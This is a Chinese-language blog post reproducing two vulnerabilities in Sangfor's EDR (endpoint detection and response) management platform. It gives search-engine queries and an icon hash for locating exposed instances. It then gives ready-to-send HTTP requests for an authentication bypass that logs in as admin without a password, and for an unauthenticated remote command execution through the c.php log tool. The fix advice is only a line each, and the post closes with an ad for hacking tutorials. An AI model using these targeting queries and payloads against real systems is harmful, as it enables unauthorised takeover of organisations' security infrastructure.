记某信漏洞复现

 

深信服-SANGFOR终端检测响应平台漏洞复现

通常访问的页面如下，存在登录框

信息收集

FOFA语法

1. title="SANGFOR终端检测响应平台"

需重点关注框框的图标，可以聚焦资产搜索

1. icon_hash="1307354852"

鹰图搜索

1. web.title="SANGFOR终端检测响应平台"

可聚焦资产

1. web.icon=="68e28d49856759ddeb91b6be3d6f7e42"

SANGFOR终端检测响应平台 - 任意用户免密登录

漏洞复现

路由后拼接/ui/login.php?user={{需要登录的用户名}}

这边以admin权限用户为例

1. GET /ui/login.php?user=admin HTTP/1.1
2. Host: {{Hostname}}

访问之后会像这样直接进入后台

修复方案

该类逻辑漏洞的起因往往与鉴权有关，需做好权限校验

SANGFOR终端检测响应平台 - 前台RCE

同一套系统

漏洞复现

路由后拼接/tool/log/c.php?strip_slashes=system&host={执行的命令}

命令执行以id为例

1. GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
2. Host: {{Hostname}}

大致页面如下所示

修复方案

该目录代码层面的逻辑问题，需要进行鉴权以及重写等处理

                             hack渗透视频教程，扫码免费领